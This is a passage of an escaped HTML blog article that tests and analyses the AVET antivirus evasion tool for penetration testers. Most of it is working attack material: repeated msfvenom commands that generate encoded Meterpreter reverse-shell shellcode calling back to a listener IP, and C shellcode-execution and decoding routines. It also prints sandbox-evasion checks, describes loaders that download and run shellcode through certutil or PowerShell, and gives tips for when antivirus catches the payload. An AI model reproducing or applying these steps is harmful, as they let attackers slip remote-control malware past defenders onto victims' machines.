file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x64\u002Fxor -f hex --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>File content as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019839099_4_74f80c3b51-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Run format.sh to extract shellcode from previous file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fformat.sh sc.txt &gt; scclean.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Extracted file content as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019860413_5_373eb0f5e1-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Personally, I believe the above two steps can be achieved with one command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x64\u002Fxor -f hex --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Run make_avet to extract shellcode from previous file, set feature flags, and write to file defs.h\u003C\u002Fh3>\u003Cp>The function flags correspond to the various features supported by make_avet; detailed explanations can be obtained by executing .\u002Fmake_avet -h.\u003C\u002Fp>\u003Cp>The specific functions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Read shellcode from a specified file and execute it.\u003C\u002Fli>\u003Cli>Read encrypted shellcode from a specified file, decrypt it, and then execute.\u003C\u002Fli>\u003Cli>Call iexplore.exe to access a specified URL, retrieve shellcode, and execute it.\u003C\u002Fli>\u003Cli>Use WinAPI socket calls to access port 80 of a specified URL, retrieve shellcode, and execute it.\u003C\u002Fli>\u003Cli>Download a file via certutil, retrieve shellcode, and execute it.\u003C\u002Fli>\u003Cli>Download a file via PowerShell, retrieve shellcode, and execute it.\u003C\u002Fli>\u003Cli>Use WinAPI fopen to bypass sandbox detection.\u003C\u002Fli>\u003Cli>Use WinAPI gethostbyname to bypass sandbox detection.\u003C\u002Fli>\u003Cli>Compile into a 64-bit executable.\u003C\u002Fli>\u003Cli>Hide the program window.\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>4. Use gcc to compile avet.c, generating the final file.\u003C\u002Fh3>\u003Cp>avet.c is the main program, reading shellcode and function flags from the header file defs.h.\u003C\u002Fp>\u003Ch2>0x05 Technical Details Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Core code for executing shellcode\u003C\u002Fh3>\u003Cp>(1)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>void exec_shellcode(unsigned char *shellcode)\u003Cbr>{\u003Cbr>\tint (*funct)();\u003Cbr>\tfunct = (int (*)()) shellcode;\u003Cbr>\t(int)(*funct)();\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameters for generating corresponding shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x86\u002Fxor -f hex -a x86 --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>void exec_shellcode_ASCIIMSF(unsigned char *shellcode)\u003Cbr>{\u003Cbr>\tregister unsigned char* r asm(\"eax\");\u003Cbr>\\tr=shellcode;\u003Cbr>\\tasm(\"call *%eax;\");\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameters for generating shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x86\u002Falpha_mixed -f hex -a x86 --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>void exec_shellcode64(unsigned char *shellcode)\u003Cbr>{\u003Cbr>\\tint len=strlen(shellcode);\u003Cbr>\\tDWORD l=0;\u003Cbr>\\tVirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&amp;l);\u003Cbr>\\t(* (int(*)()) shellcode)();\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameters for generating shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x64\u002Fxor -f hex --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The encryption method for shellcode can also choose shikata_ga_nai. The parameters for using shikata_ga_nai encryption for 50 rounds are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.2.103 lport=443 -e x86\u002Fshikata_ga_nai -i 50 -f hex -a x86 --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Supplement\u003C\u002Fstrong>：\u003C\u002Fp>\u003Cp>The method of executing shellcode is not unique; here is another example code for executing shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>void exec_shellcode(unsigned char *shellcode)\u003Cbr>{\u003Cbr>\t((void(*)(void))&amp;shellcode)();\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The method of generating shellcode is also not unique; you can generate shellcode according to your own ideas.\u003C\u002Fp>\u003Ch3>2、Self-implemented encryption and decryption algorithms\u003C\u002Fh3>\u003Cp>The corresponding parameter for encryption is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fmake_avet -E\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The corresponding code for decryption is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>unsigned char* decode_shellcode(unsigned char *buffer, unsigned char *shellcode, int size)\u003Cbr>{\u003Cbr>\tint j=0;\u003Cbr>\tshellcode=malloc((size\u002F2));\u003Cbr>\tint i=0;\u003Cbr>\tdo\u003Cbr>\t{\u003Cbr>\t\tunsigned char temp[3]={0};\u003Cbr>\t\tsprintf((char*)temp,\"%c%c\",buffer[i],buffer[i+1]);\u003Cbr>\t\tshellcode[j] = strtoul(temp, NULL, 16);\u003Cbr>\t\ti+=2;\u003Cbr>\t\tj++;\u003Cbr>\t} while(i\u003Csize);\u003Cbr>\treturn shellcode;\u003Cbr>}\u003C\u002Fsize);\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Sandbox Evasion\u003C\u002Fh3>\u003Ch4>(1) Using WinAPI fopen\u003C\u002Fh4>\u003Cp>Save shellcode in file c:\\windows\\system.ini\u003C\u002Fp>\u003Cp>Read file c:\\windows\\system.ini during main program execution\u003C\u002Fp>\u003Cp>If in sandbox, unable to open file c:\\windows\\system.ini, main program automatically exits\u003C\u002Fp>\u003Cp>Key code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>FILE *fp = fopen(\"c:\\\\windows\\\\system.ini\", \"rb\");\u003Cbr>if (fp == NULL)\u003Cbr>\treturn 0;\u003Cbr>fclose(fp);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Using WinAPI gethostbyname\u003C\u002Fh4>\u003Cp>Main program calls WinAPI gethostbyname to obtain host information for specified hostname\u003C\u002Fp>\u003Cp>If in sandbox, gethostbyname will return NULL, main program automatically exits\u003C\u002Fp>\u003Cp>Key code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>struct hostent *hp = gethostbyname(KVALUE);\u003Cbr>if (hp != NULL) \t\t\u003Cbr>\texit(0);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Methods for detecting sandbox conditions are not unique; examples include system process information, configuration information, device information, etc.\u003C\u002Fp>\u003Ch3>4. Supports remote execution via psexec\u003C\u002Fh3>\u003Cp>The main program is replaced with avetsvc.c\u003C\u002Fp>\u003Cp>Compared to avet.c, avetsvc.c adds service registration functionality, enabling remote startup via psexec as a service\u003C\u002Fp>\u003Ch2>0x06 Evasion Effectiveness\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Specific evasion effectiveness details omitted\u003C\u002Fp>\u003Cp>If detected, you can try the following methods:\u003C\u002Fp>\u003Cul>\u003Cli>Modify the shellcode\u003C\u002Fli>\u003Cli>Encrypt the shellcode\u003C\u002Fli>\u003Cli>Change the shellcode loading method\u003C\u002Fli>\u003Cli>Use a trusted program with a digital signature to launch the shellcode\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article conducts practical testing on avet, analyzing its technical details while omitting the actual antivirus evasion effectiveness.\u003C\u002Fp>\u003Cp>Overall, avet implements a complete framework, making it easy to perform secondary development on this basis, which indeed can enhance the efficiency of penetration testers.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1705,"Onedaysec",5,"published","2026-02-02T08:20:05.021Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"AVET AntiVirus Evasion Tool Testing & Analysis Guide","avet antivirus evasion, bypass antivirus, meterpreter payload, shellcode, penetration testing, blackhat arsenal",null,false,[],{"docs":43,"hasNextPage":40},[44,4,45,46],111,109,108,{"title":39,"description":39,"image":39},"2026-07-24T15:37:15.407Z","2026-07-23T16:01:01.330Z","draft","2026-07-23T16:03:41.761Z","2026-07-23T16:03:41.760Z"]